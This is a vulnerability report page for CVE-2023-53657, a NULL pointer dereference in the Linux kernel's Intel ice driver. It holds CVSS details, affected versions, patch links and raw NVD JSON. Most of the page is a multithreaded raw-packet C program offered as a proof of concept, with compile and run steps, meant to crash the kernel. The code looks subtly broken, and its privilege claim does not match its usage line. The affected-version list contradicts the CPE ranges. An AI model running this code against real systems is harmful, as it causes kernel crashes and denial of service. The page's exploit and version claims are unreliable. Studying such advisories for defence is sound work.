Security Vulnerability Report
CVE-2023-53657 CVSS 5.5 MEDIUM

CVE-2023-53657

Published: 2025-10-07 16:15:49
Last Modified: 2026-02-03 19:27:32
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ice: Don't tx before switchdev is fully configured

There is possibility that ice_eswitch_port_start_xmit might be called while some resources are still not allocated which might cause NULL pointer dereference. Fix this by checking if switchdev configuration was finished.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

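cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 5.16 up to, but not including, 6.1.55) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.2 up to, but not including, 6.5.5) - VULNERABLE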
Linux kernel < 6.6 (for the specific affected versions, refer to the fix commit)
Linux kernel 6.6.x (some versions)
Linux kernel 6.1.x (LTS branch)
Linux kernel 5.15.x (LTS branch)
Linux kernel 5.10.x (LTS branch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2023-53657 PoC - Trigger NULL pointer dereference in ice_eswitch_port_start_xmit
 * This PoC demonstrates how to trigger the vulnerability by sending packets
 * before switchdev configuration is complete.
 *
 * Note: This requires a system with Intel ice-supported network hardware
 * and appropriate low-privilege local access.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>        /* htons() */
#include <linux/if_ether.h>   /* ETH_P_ALL */
#include <linux/if_packet.h>
#include <net/if.h>
#include <sys/ioctl.h>
#include <pthread.h>
#include <errno.h>

#define INTERFACE_NAME "eth0"
#define PACKET_SIZE 64
#define NUM_THREADS 4
#define NUM_PACKETS 1000

// Function to send raw packets on the interface
int send_raw_packet(const char *ifname)
{
    int sockfd;
    struct ifreq ifr;
    struct sockaddr_ll sll;
    char packet[PACKET_SIZE];

    // Create raw socket
    sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sockfd < 0) {
        perror("socket");
        return -1;
    }

    // Get interface index
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1);
    if (ioctl(sockfd, SIOCGIFINDEX, &ifr) < 0) {
        perror("ioctl SIOCGIFINDEX");
        close(sockfd);
        return -1;
    }

    // Setup sockaddr_ll
    memset(&sll, 0, sizeof(sll));
    sll.sll_family = AF_PACKET;
    sll.sll_ifindex = ifr.ifr_ifindex;
    sll.sll_protocol = htons(ETH_P_ALL);

    // Bind socket
    if (bind(sockfd, (struct sockaddr *)&sll, sizeof(sll)) < 0) {
        perror("bind");
        close(sockfd);
        return -1;
    }

    // Zero the buffer so no uninitialized stack bytes end up in the frame
    memset(packet, 0, sizeof(packet));

    // Prepare packet (broadcast with random payload)
    memset(packet, 0xFF, 6);                  // Destination: broadcast
    memset(packet + 6, 0x00, 6);              // Source: zeros
    memset(packet + 12, 0x08, 1);             // Type: IPv4
    memset(packet + 14, 0x45, 1);             // IP header start
    memset(packet + 15, 0x00, 1);
    memset(packet + 16, PACKET_SIZE - 14, 2); // Length

    // Fill rest with random data
    for (int i = 20; i < PACKET_SIZE; i++) {
        packet[i] = rand() % 256;
    }

    // Send packets rapidly to trigger TX path
    for (int i = 0; i < NUM_PACKETS; i++) {
        if (sendto(sockfd, packet, PACKET_SIZE, 0,
                   (struct sockaddr *)&sll, sizeof(sll)) < 0) {
            if (errno == ENETDOWN || errno == ENETUNREACH) {
                // Expected during switchdev configuration
                continue;
            }
        }
        usleep(1); // Small delay to allow concurrent configuration
    }

    close(sockfd);
    return 0;
}

// Thread function to send packets concurrently
void *packet_sender(void *arg)
{
    char *ifname = (char *)arg;

    send_raw_packet(ifname);
    return NULL;
}

int main(int argc, char *argv[])
{
    const char *ifname = INTERFACE_NAME;
    pthread_t threads[NUM_THREADS];

    if (argc > 1) {
        ifname = argv[1];
    }

    printf("CVE-2023-53657 PoC - ice driver NULL pointer dereference\n");
    printf("Interface: %s\n", ifname);
    printf("Note: This should be run while switchdev configuration is in progress\n");
    printf("      (e.g., simultaneously with 'devlink port function set' commands)\n\n");

    // Create multiple threads to send packets concurrently
    for (int i = 0; i < NUM_THREADS; i++) {
        if (pthread_create(&threads[i], NULL, packet_sender, (void *)ifname) != 0) {
            perror("pthread_create");
            return 1;
        }
    }

    // Wait for all threads to complete
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }

    printf("\nPoC execution completed. Check dmesg for kernel oops/panic.\n");
    return 0;
}

/*
 * Compilation: gcc -o poc poc.c -lpthread
 * Usage: sudo ./poc eth0
 *
 * Expected behavior on vulnerable systems:
 * - Kernel NULL pointer dereference in ice_eswitch_port_start_xmit
 * - System may experience kernel panic or oops
 * - dmesg will show BUG: unable to handle kernel NULL pointer dereference
 *
 * To trigger the vulnerability:
 * 1. Ensure system has Intel ice-supported NIC
 * 2. Run this PoC while switchdev configuration is happening
 * 3. Or trigger switchdev mode change while traffic is flowing
 */

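References

https://git.kernel.org/stable/c/5760a72b3060150b587eff3e879648c7470efddd (Patch)
https://git.kernel.org/stable/c/63ff5a94649837d980e3b9ef535c793ec8cb0ca7 (Patch)
https://git.kernel.org/stable/c/7aa529a69e92b9aff585e569d5003f7c15d8d60b (Patch)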

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53657", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:49.330", "lastModified": "2026-02-03T19:27:32.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: Don't tx before switchdev is fully configured\n\nThere is possibility that ice_eswitch_port_start_xmit might be\ncalled while some resources are still not allocated which might\ncause NULL pointer dereference. Fix this by checking if switchdev\nconfiguration was finished."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.55", "matchCriteriaId": "0EFCF8E8-5528-46B9-8C17-B09792899CE0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.5", "matchCriteriaId": "8CF71E85-DA24-4925-95C5-E5C15DA71AE6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5760a72b3060150b587eff3e879648c7470efddd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/63ff5a94649837d980e3b9ef535c793ec8cb0ca7", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7aa529a69e92b9aff585e569d5003f7c15d8d60b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}